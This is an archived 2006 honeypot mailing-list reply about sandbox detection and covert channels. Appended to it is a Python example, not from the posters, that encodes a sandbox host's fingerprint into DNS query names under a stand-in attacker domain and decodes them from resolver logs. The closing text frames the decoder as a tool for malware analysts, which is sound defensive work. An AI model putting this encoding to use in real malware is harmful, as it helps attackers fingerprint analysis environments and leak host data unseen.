Honeypots mailing list archives
Re: Looking for Honeypots???
From: Thorsten Holz <thorsten.holz () mmweg rwth-aachen de>
Date: Thu, 06 Apr 2006 12:06:58 -0700
On 06.04.2006, at 10:55, David Jiménez Domínguez wrote:
> One example is the submit-norman module in nepenthes... when the malware has anti-VMware techniques (for example by looking for the VMware Tools registry key or a MAC address) the report sent by Norman is useless...
Please note that the Norman Sandbox does not run under VMware, so checking for registry keys will not help a given piece of malware :-) Consult the whitepaper about the Sandbox to learn more about it: http://sandbox.norman.no/pdf/03_sandbox%20whitepaper.pdf
> In the near future, could someone write code to first inspect the characteristics of the "sandhost" where the malware is run, and make some DNS queries to a domain name where this information is shown???... for example: mac00-00-00-71-B4-AA.com so.win2k.net vmware.present.net ip.192.168.1.2.com This information is going to be sent to the bad guy by email and he could map all the information he needed. Do you know if it is possible?
Depends on how the sandbox is designed. If the sandbox is isolated from the Internet, there should be no communication flow. Certainly there could be some covert channel using the output of the sandbox, though....
Just my thoughts, Thorsten
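The fingerprint-over-DNS scheme David sketches above, worked through as an added example (this is not code from either poster or from nepenthes): one query name per field, the value base32-encoded so that it survives as a DNS label, plus the collector-side decoder that rebuilds the fields from a resolver's query log. The zone name collector.example, the field set and the log lines are constructed for the example and are assumptions, not anything from the thread.

```python
import base64
import binascii
import re

# Hypothetical attacker-controlled zone (an assumption for this example, not from the thread).
COLLECTOR_DOMAIN = "collector.example"

# Constructed sample fingerprint, using the fields David sketched in his mail.
SAMPLE_FINGERPRINT = {
    "mac": "00-00-00-71-B4-AA",
    "os": "win2k",
    "vmware": "present",
    "ip": "192.168.1.2",
}

# A legal DNS label: letters, digits, hyphens, no leading/trailing hyphen, at most 63 octets.
_LABEL_RE = re.compile(r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$")


def _b32(text: str) -> str:
    """RFC 4648 base32 without padding: the alphabet is [A-Z2-7], so the result is a
    valid label; DNS is case-insensitive, so lowercasing it is safe."""
    return base64.b32encode(text.encode()).decode().rstrip("=").lower()


def _unb32(encoded: str) -> str:
    """Reverse of _b32: restore '=' padding to a multiple of 8 and decode."""
    padded = encoded + "=" * (-len(encoded) % 8)
    return base64.b32decode(padded, casefold=True).decode()


def encode_fingerprint(fields: dict, domain: str = COLLECTOR_DOMAIN) -> list:
    """Turn each (key, value) into one query name: <key>.<base32 chunks>.<domain>.
    Labels are capped at 63 octets and the whole name at 253 (RFC 1035 limits)."""
    names = []
    for key, value in fields.items():
        if not _LABEL_RE.match(key):
            raise ValueError(f"key {key!r} is not a valid DNS label")
        encoded = _b32(str(value))
        chunks = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
        name = ".".join([key, *chunks, domain])
        if len(name) > 253:
            raise ValueError(f"{key}: value does not fit in one query name")
        names.append(name)
    return names


def decode_queries(qnames, domain: str = COLLECTOR_DOMAIN) -> dict:
    """Collector side: rebuild the fingerprint from the names that were looked up.
    Names under the zone that are not <key>.<base32>... are skipped, not crashed on."""
    suffix = "." + domain
    fields = {}
    for qname in qnames:
        qname = qname.rstrip(".").lower()
        if not qname.endswith(suffix):
            continue
        labels = qname[: -len(suffix)].split(".")
        if len(labels) < 2:
            continue
        try:
            fields[labels[0]] = _unb32("".join(labels[1:]))
        except (binascii.Error, UnicodeDecodeError):
            continue  # ordinary lookup that happens to fall under the zone
    return fields


# BIND-style query log line (constructed format):
#   client 192.168.1.2#1034: query: mac.<base32>.collector.example IN A +
_QUERY_LOG_RE = re.compile(r"query: (\S+) IN ")


def fingerprint_from_log(lines, domain: str = COLLECTOR_DOMAIN) -> dict:
    """Pull the queried names out of resolver log lines and decode them."""
    qnames = [m.group(1) for m in map(_QUERY_LOG_RE.search, lines) if m]
    return decode_queries(qnames, domain)


def sample_log() -> list:
    """Constructed resolver log: the fingerprint queries mixed with unrelated lookups."""
    lines = ["client 192.168.1.2#1034: query: www.example.org IN A +"]
    lines += [f"client 192.168.1.2#1034: query: {n} IN A +"
              for n in encode_fingerprint(SAMPLE_FINGERPRINT)]
    lines.append("client 192.168.1.2#1034: query: ntp.collector.example IN A +")  # in zone, no payload
    return lines


if __name__ == "__main__":
    for name in encode_fingerprint(SAMPLE_FINGERPRINT):
        print(name)
    print(fingerprint_from_log(sample_log()))
```

Nothing here sends a packet: the encoder only builds names, and whether they ever reach the collector is exactly Thorsten's point. In a sandbox cut off from the Internet the lookups go no further than the sandbox's own resolver log, where the same decoder hands the analyst, rather than the attacker, the list of what the sample tried to leak.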
Current thread:
- Looking for Honeypots??? David Jiménez Domínguez (Apr 05)
- Re: Looking for Honeypots??? Mark Ryan del Moral Talabis (Apr 05)
- Re: Looking for Honeypots??? David Jiménez Domínguez (Apr 06)
- Re: Looking for Honeypots??? Thorsten Holz (Apr 06)
- Re: Looking for Honeypots??? David Jiménez Domínguez (Apr 06)
- <Possible follow-ups>
- RE: Looking for Honeypots??? Roger A. Grimes (Apr 05)
- RE: Looking for Honeypots??? Mohd Rosli Saidin (Apr 06)
- RE: Looking for Honeypots??? Roger A. Grimes (Apr 09)
- Re: Looking for Honeypots??? Mark Ryan del Moral Talabis (Apr 05)